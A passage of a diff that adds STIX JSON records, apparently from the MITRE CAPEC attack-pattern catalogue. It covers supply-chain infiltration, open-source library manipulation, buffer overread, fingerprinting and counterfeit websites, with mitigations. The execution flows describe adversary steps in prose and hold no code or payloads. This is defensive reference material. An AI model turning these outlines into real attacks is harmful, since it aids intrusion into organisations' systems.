], + "x_capec_example_instances": [ + "An adversary wishes to bypass a security system to access an additional network segment where critical data is kept. The adversary knows that some configurations of the security system will allow for remote bypass under certain conditions, such as switching a specific parameter to a different value. 
The adversary knows the bypass will work but also will be detected within the logging data of the security system. The adversary waits until an upgrade is performed to the security system by the victim's system administrators, and the adversary has access to an external logging system. The adversary injects false log entries that cause the administrators to think there are two different error states within the security system - one involving the specific parameter and the other involving the logging entries. The specific parameter is adjusted to a different value, and the logging level is reduced to a lower level that will not cause an adversary bypass to be detected. The adversary stops injecting false log data, and the administrators of the security system believe the issues were caused by the upgrade and are now resolved. The adversary is then able to bypass the security system." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine configuration process: The adversary, through a previously compromised system, either remotely or physically, determines what the configuration process is. They look at configuration files, data files, and running processes on the system to identify areas where they could inject malicious data.

  2. Determine when configuration occurs: The adversary needs to then determine when configuration or recalibration of a system occurs so they know when to inject malicious data.

  3. Techniques
    Look for a weekly update cycle or repeated update schedule.
    Insert a malicious process into the target system that notifies the adversary when configuration is occurring.

Experiment

  1. Determine malicious data to inject: By looking at the configuration process, the adversary needs to determine what malicious data they want to insert and where to insert it.

  2. Techniques
    Add false log data
    Change configuration files
    Change data files

Exploit

  1. Inject malicious data: Right before, or during system configuration, the adversary injects the malicious data. This leads to the system behaving in a way that is beneficial to the adversary and is often followed by other attacks.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The attacker must have previously compromised the victim's systems or have physical access to the victim's systems.", + "Advanced knowledge of software and hardware capabilities of a manufacturer's product." + ], + "x_capec_skills_required": { + "High": "Ability to generate and inject false data into operational data into a system with the intent of causing the victim to alter the configuration of the system." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that proper access control is implemented on all systems to prevent unauthorized access to system files and processes.", + "id": "course-of-action--5a991a71-810a-4fb9-ba49-7ad88b6ccca5", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-536-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bb32fca6-85ac-4fed-ab7a-d07e0bf5d9bb", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5a991a71-810a-4fb9-ba49-7ad88b6ccca5", + "target_ref": "attack-pattern--be032a5f-7575-4e82-86d8-6c5cabb3d9dd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, leveraging the ability to manipulate components of primary support systems and tools within the development and production environments, inserts malicious 
software within the hardware and/or firmware development environment. The infiltration purpose is to alter developed hardware components in a system destined for deployment at the victim's organization, for the purpose of disruption or further compromise.", + "external_references": [ + { + "external_id": "CAPEC-537", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/537.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Cristin Goodwin, Joram Borenstein, Guarding against supply chain attacks—Part 2: Hardware risks, 2020--02---03, Microsoft", + "external_id": "REF-712", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/security/blog/2020/02/03/guarding-against-supply-chain-attacks-part-2-hardware-risks/" + } + ], + "id": "attack-pattern--7fb3fea4-e993-49f7-8c36-d58dd5038ad8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Infiltration of Hardware Development Environment", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "\n The adversary, knowing the manufacturer runs email on a system adjacent to the hardware development systems used for hardware and/or firmware design, sends a phishing email with a malicious attachment to the manufacturer. 
When viewed, the malicious attachment installs a backdoor that allows the adversary to remotely compromise the adjacent hardware development system from the manufacturer's workstation. The adversary is then able to exfiltrate and alter sensitive data on the hardware system, allowing for future compromise once the developed system is deployed at the victim location.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The victim must use email or removable media from systems running the IDE (or systems adjacent to the IDE systems).", + "The victim must have a system running exploitable applications and/or a vulnerable configuration to allow for initial infiltration.", + "The adversary must have working knowledge of some if not all of the components involved in the IDE system as well as the infrastructure." + ], + "x_capec_skills_required": { + "High": "Development skills to construct malicious attachments that can be used to exploit vulnerabilities in typical desktop applications or system configurations. The malicious attachments should be crafted well enough to bypass typical defensive systems (IDS, anti-virus, etc)", + "Medium": "Intelligence about the manufacturer's operating environment and infrastructure." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Verify software downloads and updates to ensure they have not been modified be adversaries", + "id": "course-of-action--aba55887-195f-49b2-b2cf-5d26b34dd710", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-537-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7ffabfce-822a-4165-a38e-cb6682cc1b01", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aba55887-195f-49b2-b2cf-5d26b34dd710", + "target_ref": "attack-pattern--7fb3fea4-e993-49f7-8c36-d58dd5038ad8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage antivirus tools to detect known malware", + "id": "course-of-action--a602fd92-93fd-42f5-9926-a7a31904ce6d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-537-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5232e2c2-76f2-413b-b430-174a1e5c5e40", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + 
"source_ref": "course-of-action--a602fd92-93fd-42f5-9926-a7a31904ce6d", + "target_ref": "attack-pattern--7fb3fea4-e993-49f7-8c36-d58dd5038ad8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not download software from untrusted sources", + "id": "course-of-action--557960a1-b40a-4a60-8750-d1649c2bbea2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-537-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7c96fb42-fe4c-4ecc-a424-bf85159f9b92", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--557960a1-b40a-4a60-8750-d1649c2bbea2", + "target_ref": "attack-pattern--7fb3fea4-e993-49f7-8c36-d58dd5038ad8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Educate designers, developers, engineers, etc. 
on social engineering attacks to avoid downloading malicious software via attacks such as phishing attacks", + "id": "course-of-action--0ba5f98c-6878-4132-908b-4b27bd6e56c3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-537-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dc17b843-2585-4684-b2b8-386159db9f64", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0ba5f98c-6878-4132-908b-4b27bd6e56c3", + "target_ref": "attack-pattern--7fb3fea4-e993-49f7-8c36-d58dd5038ad8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries implant malicious code in open source software (OSS) libraries to have it widely distributed, as OSS is commonly downloaded by developers and other users to incorporate into software development projects. 
The adversary can have a particular system in mind to target, or the implantation can be the first stage of follow-on attacks on many systems.", + "external_references": [ + { + "external_id": "CAPEC-538", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/538.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "Supply Chain Compromise: Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + } + ], + "id": "attack-pattern--ca626464-877a-4f42-83b7-7451cfe71a38", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Open-Source Library Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary with access to an open source code project introduces a hard-to-find bug in the software that allows under very specific conditions for encryption to be disabled on data streams. The adversary commits the change to the code which is picked up by a manufacturer who develops VPN software. 
It is eventually deployed at the victim's location where the very specific conditions are met giving the adversary the ability to sniff plaintext traffic thought to be encrypted. This can provide to the adversary access to sensitive data of the victim." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine the relevant open-source code project to target: The adversary will make the selection based on various criteria:

Experiment

  1. Develop a plan for malicious contribution: The adversary develops a plan to contribute malicious code, taking the following into consideration:

Exploit

  1. Execute the plan for malicious contribution: Write the code to be contributed based on the plan and then submit the contribution. Multiple commits, possibly using multiple identities, will help obscure the attack. Monitor the contribution site to try to determine if the code has been uploaded to the target system.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Access to the open source code base being used by the manufacturer in a system being developed or currently deployed at a victim location." + ], + "x_capec_skills_required": { + "High": "Advanced knowledge about the inclusion and specific usage of an open source code project within system being targeted for infiltration." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to the development environment process of an application-specific integrated circuit (ASIC) for a victim system being developed or maintained after initial deployment can insert malicious functionality into the system for the purpose of disruption or further compromise.", + "external_references": [ + { + "external_id": "CAPEC-539", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/539.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. 
Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + } + ], + "id": "attack-pattern--bfb711d6-f12d-496e-88b9-2c0184485976", + "modified": "2022-09-29T00:00:00.000Z", + "name": "ASIC With Malicious Functionality", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "A hardware manufacturer periodically updates its ASIC with new features. The attacker, knowing the manufacturer runs email on a system adjacent to the hardware development systems used for ASIC design, sends a phishing email with a malicious attachment to the manufacturer. When viewed, the malicious attachment installs a backdoor that allows the attacker to remotely compromise the adjacent ASIC development system. The attacker is then able to exfiltrate and alter sensitive data on the ASIC system, allowing for future compromise once a new AISC is deployed at the victim location." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The attacker must have working knowledge of some if not all of the components involved in the target system as well as the infrastructure and development environment of the manufacturer.", + "Advanced knowledge about the ASIC installed within the target system." + ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious subroutines for an ASIC environment without degradation of existing functions and processes." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, aware of an application's location (and possibly authorized to use the application), probes an application's structure and evaluates its robustness by submitting requests and examining responses. Often, this is accomplished by sending variants of expected queries in the hope that these modified queries might return information beyond what the expected set of queries would provide.", + "external_references": [ + { + "external_id": "CAPEC-54", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/54.html" + }, + { + "external_id": "CWE-209", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/209.html" + } + ], + "id": "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Query System for Information", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Blind SQL injection is an example of this technique, applied to successful exploit. See also: CVE-2006-4705", + "\n Attacker sends bad data at various servlets in a J2EE system, records returned exception stack traces, and maps application functionality.\n In addition, this technique allows attackers to correlate those servlets used with the underlying open source packages (and potentially version numbers) that provide them.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine parameters: Determine all user-controllable parameters of the application either by probing or by finding documentation

Experiment

  1. Cause error condition: Inject each parameter with content that causes an error condition to manifest

  2. Modify parameters: Modify the content of each parameter according to observed error conditions

Exploit

  1. Follow up attack: Once the above steps have been repeated with enough parameters, the application will be sufficiently mapped out. The adversary can then launch a desired attack (for example, Blind SQL Injection)

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--62c46d1c-f091-467e-a4b0-61927db31f38", + "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "attack-pattern--ce75149a-6882-4b07-8841-db9d6a9ec20d", + "attack-pattern--5871f734-1898-4509-860c-f418cdf6b2ac", + "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12" + ], + "x_capec_prerequisites": [ + "This class of attacks does not strictly require authorized access to the application. As Attackers use this attack process to classify, map, and identify vulnerable aspects of an application, it simply requires hypotheses to be verified, interaction with the application, and time to conduct trial-and-error activities." + ], + "x_capec_resources_required": [ + "\n The Attacker needs the ability to probe application functionality and provide it erroneous directives or data without triggering intrusion detection schemes or making enough of an impact on application logging that steps are taken against the adversary.\n The Attack does not need special hardware, software, skills, or access.\n " + ], + "x_capec_skills_required": { + "Medium": "Although fuzzing parameters is not difficult, and often possible with automated fuzzers, interpreting the error conditions and modifying the parameters so as to move further in the process of mapping the application requires detailed knowledge of target platform, the languages and packages used as well as software design." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Application designers can construct a 'code book' for error messages. When using a code book, application error messages aren't generated in string or stack trace form, but are cataloged and replaced with a unique (often integer-based) value 'coding' for the error. 
Such a technique will require helpdesk and hosting personnel to use a 'code book' or similar mapping to decode application errors/logs in order to respond to them normally.", + "id": "course-of-action--031e02fe-84e7-4908-b507-e836876da1ab", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-54-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04308827-581a-464a-8378-efed9a9a7476", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--031e02fe-84e7-4908-b507-e836876da1ab", + "target_ref": "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Application designers can wrap application functionality (preferably through the underlying framework) in an output encoding scheme that obscures or cleanses error messages to prevent such attacks. 
Such a technique is often used in conjunction with the above 'code book' suggestion.", + "id": "course-of-action--c001766e-e441-4291-8f06-f59957360fde", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-54-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--60cbe06e-8a08-42af-a4ab-f81130b139ce", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c001766e-e441-4291-8f06-f59957360fde", + "target_ref": "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary attacks a target by providing input that causes an application to read beyond the boundary of a defined buffer. This typically occurs when a value influencing where to start or stop reading is set to reflect positions outside of the valid memory location of the buffer. 
This type of attack may result in exposure of sensitive information, a system crash, or arbitrary code execution.", + "external_references": [ + { + "external_id": "CAPEC-540", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/540.html" + }, + { + "external_id": "CWE-125", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/125.html" + } + ], + "id": "attack-pattern--40eddae8-4d7d-4fc3-b220-1c9706f01a96", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Overread Buffers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--476ca631-2695-43f8-82f6-83c06a07ae36" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (Depending on the use of the target buffer, an application or system crash can be achieved.)" + ], + "Confidentiality": [ + "Read Data (By reading outside the boundary of the intended buffer, the adversary is potentially able to see any data that is stored on the disk. This could include secret keys, personal information, and sensitive files.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program to perform the buffer overread on. Adversaries often look for applications that accept user input and that perform manual memory management.

Experiment

  1. Find attack vector: The adversary identifies an attack vector by looking for areas in the application where they can specify to read more data than is required.

Exploit

  1. Overread the buffer: The adversary provides input to the application that gets it to read past the bounds of a buffer, possibly revealing sensitive information that was not intended to be given to the adversary.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "For this type of attack to be successful, a few prerequisites must be met. First, the targeted software must be written in a language that enables fine grained buffer control. (e.g., c, c++) Second, the targeted software must actually perform buffer operations and inadequately perform bounds-checking on those buffer operations. Finally, the adversary must have the capability to influence the input that guides these buffer operations." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in fingerprinting activities to determine the type or version of an application installed on a remote target.", + "external_references": [ + { + "external_id": "CAPEC-541", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/541.html" + }, + { + "external_id": "CWE-204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/204.html" + }, + { + "external_id": "CWE-205", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/205.html" + }, + { + "external_id": "CWE-208", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/208.html" + }, + { + "description": "Gather Victim Host Information: Software", + "external_id": "T1592.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1592/002" + } + ], + "id": "attack-pattern--e7eec058-4cd9-4fa0-8784-ed961d8d7290", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Application Fingerprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--76e6fe1e-34f2-40cd-8f12-f4d4f9c41808" + ], + 
"x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--0cf857f6-afa4-4f0c-850f-58a4f11df157", + "attack-pattern--8b7dfd02-8d21-4eed-a2a3-d9f73ed49a48", + "attack-pattern--29e8786c-a791-44c6-b1de-950cf0604643" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary develops targeted malware that takes advantage of a known vulnerability in an organizational information technology environment. The malware crafted for these attacks is based specifically on information gathered about the technology environment. Successfully executing the malware enables an adversary to achieve a wide variety of negative technical impacts.", + "external_references": [ + { + "external_id": "CAPEC-542", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/542.html" + }, + { + "description": "Develop Capabilities: Malware", + "external_id": "T1587.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1587/001" + }, + { + "description": "Obfuscated Files or Information", + "external_id": "T1027", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027" + } + ], + "id": "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Targeted Malware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--9250f041-d55b-4610-aff0-979b5800dc18" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80" + ], + "x_capec_domains": [ + 
"Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--aef8e9e0-4714-4890-9470-06276c61abfd", + "attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc", + "attack-pattern--79037ec7-444c-42cb-a64b-fb4b4f6bd156", + "attack-pattern--ccb9c607-8bfe-4141-8843-356453179da7", + "attack-pattern--d9069913-2a5f-4ad5-878e-73181f0b1067", + "attack-pattern--b63b2869-11e6-4849-8ddf-ae2557bf554b", + "attack-pattern--9927fda8-927b-4327-b3f8-bcbd0467c702", + "attack-pattern--c253fd5b-9ae6-4f42-868a-52b25b7dd1f4" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversary creates duplicates of legitimate websites. When users visit a counterfeit site, the site can gather information or upload malware.", + "external_references": [ + { + "external_id": "CAPEC-543", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/543.html" + }, + { + "description": "Masquerading: Match Legitimate Name or Location", + "external_id": "T1036.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/005" + } + ], + "id": "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Counterfeit Websites", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285" + ], + "x_capec_child_of_refs": [ + 
"attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary creates a false front organizations with the appearance of a legitimate supplier in the critical life cycle path that then injects corrupted/malicious information system components into the organizational supply chain.", + "external_references": [ + { + "external_id": "CAPEC-544", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/544.html" + } + ], + "id": "attack-pattern--996aa0f7-950e-4435-a60d-ae859e545101", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Counterfeit Organizations", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary who is authorized or has the ability to search known system resources, does so with the intention of gathering useful information. System resources include files, memory, and other aspects of the target system. In this pattern of attack, the adversary does not necessarily know what they are going to find when they start pulling data. 
